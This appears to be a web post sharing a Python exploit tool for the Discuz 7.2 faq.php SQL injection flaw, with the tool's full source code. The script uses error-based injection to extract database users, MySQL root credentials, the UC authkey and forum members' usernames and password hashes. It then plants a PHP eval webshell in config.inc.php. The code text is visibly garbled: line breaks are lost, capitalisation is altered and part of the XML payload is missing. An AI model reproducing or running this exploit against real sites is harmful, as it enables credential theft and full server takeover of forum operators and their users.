Python-written version of the Discuz7.2 faq.php Injection Vulnerability Tool

Discuz 7.2 faq.php Fully automated tool, Getshell and dump data, Python version of Uc_key Getshell part of the code from the online (thanks to the author)

Implementation code:

#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*- # author iswin import sysimport Hashlibimport timeimport mathimport base64import urllib2 import urllibimport redef sendrequest (url,para): Try:data = Urllib.urlencode (para) req=urllib2. Request (Url,data) Res=urllib2.urlopen (req,timeout=20). Read () except Exception, E:print ' Exploit failed!\n%s '% (e) exit (0); return resdef gettableprefix (URL):p rint ' Start gettableprefix ... ' para={' action ': ' Grouppermission ', ' gids[99 ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (select HEX (table_name) from INFORMATION_SCHEMA. TABLES where table_schema=database () limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) # '}res= SendRequest (Url,para);p re=re.findall ("Duplicate entry ' (. *?) '", res); If Len (pre) ==0:print ' Exploit failed! ' Exit (0); Table_pre=pre[0][:len (Pre[0]) -1].decode (' hex ') table_pre=table_pre[0:table_pre.index ('_')]print ' Table_ pre:%s '% (table_pre) return table_predef Getcurrentuser(URL):p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat ( User (), Floor (rand (0) *) x from Information_schema.tables Group by X) a) # '}res=sendrequest (Url,para) Pre=re.findall (" Duplicate entry ' (. *?) ' ", res) if Len (pre) ==0:print ' Exploit failed! ' Exit (0); Table_pre=pre[0][:len (pre[0]) -1]print ' current user:%s '% (table_pre) return table_predef getuckey (URL):p ara= {' Action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat ((select SUBSTR (authkey,1,62) from cdb_uc_applications limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a # '}para1={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (( Select substr (authkey,63,2) from cdb_uc_applications limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a) # '}res=sendrequest (Url,para); Res1=sendrequest (URL,PARA1); Key1=re.findall ("Duplicate entry ' (. *?) '", RES) Key2=re.finDall ("Duplicate Entry" (. *?) ' ", res1) If Len (key1) ==0:print ' Get uc_key failed! ' Return ' Key=key1[0][:len (key1[0]) -1]+key2[0][:len (key2[0]) -1]print ' uc_key:%s '% (key) return keydef getrootuser (url :p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0] ': ') and (select 1 from (SELECT COUNT (*), concat (( Select Concat (User,0x20,password) from Mysql.user limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by x) a) # '}res=sendrequest (Url,para);p re=re.findall ("Duplicate entry ' (. *?) '", res) if Len (pre) ==0:print ' Exploit failed! ' Exit (0); Table_pre=pre[0][:len (Pre[0]) -1].split (") print ' root info:\nuser:%s password:%s '% (table_pre[0],table_pre [1]) def dumpdata (url,table_prefix,count):p ara={' action ': ' Grouppermission ', ' gids[99] ': ' \ ', ' gids[100][0 ' ': ') and ( Select 1 from (SELECT COUNT (*), concat ((select Concat (Username,0x20,password) from%s_members limit%d,1), Floor (rand (0) * 2) x from Information_schema.tables Group by X) a) # '% (table_prefix,count)}res=sendrequest (Url,para);d Atas=re.findaLL ("Duplicate entry" (. *?) ' ", res) if Len (datas) ==0:print ' Exploit failed! ' Exit (0) Cleandata=datas[0][:len (datas[0]) -1]info=cleandata.split (") print ' user:%s pass:%s '% (info[0],info[1]) def Microtime (get_as_float = False): If Get_as_float:return time.time () Else:return '%.8f%d '% math.modf (time.time ()) def get_authcode (string, key = "): Ckey_length = 4 key = HASHLIB.MD5 (key). Hexdigest () Keya = HASHLIB.MD5 (Key[0:16] ). Hexdigest () keyb = HASHLIB.MD5 (key[16:32]). Hexdigest () Keyc = (Hashlib.md5 (Microtime ())). Hexdigest ()) [-ckey_length: ] Cryptkey = Keya + hashlib.md5 (KEYA+KEYC). Hexdigest () key_length = Len (cryptkey) string = ' 0000000000 ' + (hashlib.md5 (STRING+KEYB)). Hexdigest () [0:16]+string string_length = Len (string) result = "box = Range (0, 0) Rndkey = dict () for I in range    : rndkey[i] = ord (cryptkey[i% key_length]) j=0 for I in Range (0,256): j = (j + box[i] + rndkey[i])% 256 TMP = Box[i] box[i] = box[j] box[j] = tmp a=0 j=0 for I in RanGE (0,string_length): a = (A + 1)% J = (j + box[a])% TMP = Box[a] box[a] = box[j] box[j] = tmp Result + = Chr (ord (String[i]) ^ (box[(Box[a] + box[j])) return KEYC + base64.b64encode (result). replace (' = ', ') de F Get_shell (Url,key,host): headers={' accept-language ': ' ZH-CN ', ' content-type ': ' application/x-www-form-urlencoded ' , ' user-agent ': ' Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ', ' Referer ': url} tm = Time.time () +10*3600 tm= "Time=%d&action=updateapps"%TM code = urllib.quote (Get_authco       De (Tm,key)) url=url+ "? code=" +code data1= "" <?xml version= "1.0" encoding= "Iso-8859-1"?>
 
  
   
    http://xxx\ '); eval ($_post[3]);//
         
       

  
 "' Try:req=urllib2.  Request (url,data=data1,headers=headers) ret=urllib2.urlopen (req) except:return "Exploit falied" data2= "<?xml Version= "1.0" encoding= "Iso-8859-1"?>
 
  
   
    http://aaa
         
       

  
 "' Try:req=urllib2. Request (url,data=data2,headers=headers) ret=urllib2.urlopen (req) except:return "error" try:req=urllib2. Request (host+ '/config.inc.php ') Res=urllib2.urlopen (req,timeout=20). Read () except Exception, E:print ' Getwebshell failed,%s '% (e) return print "Webshell:" +host+ "/config.inc.php,password:3" if __name__ = = ' __main__ ':p rint ' dz7.x Exp Cod E by Iswin ' If Len (sys.argv) <3:print ' dz7.x Exp Code by Iswin\nusage:python dz7.py http://www.bitsCN.com ' exit (0) Url= sys.argv[1]+ '/faq.php ' Count=int (sys.argv[2]) user=getcurrentuser (URL) if User.startswith (' root@ '): GetRootUser (URL ) Uc_key=getuckey (URL) If Len (uc_key) ==64:print ' Start Getwebshell ... ' Get_shell (sys.argv[1]+ '/api/uc.php ', Uc_key, SYS.ARGV[1]) tb_pre=gettableprefix (URL) print ' Start dumpdata ... ' for x in Xrange (0,count):d umpdata (url,tb_pre,x)

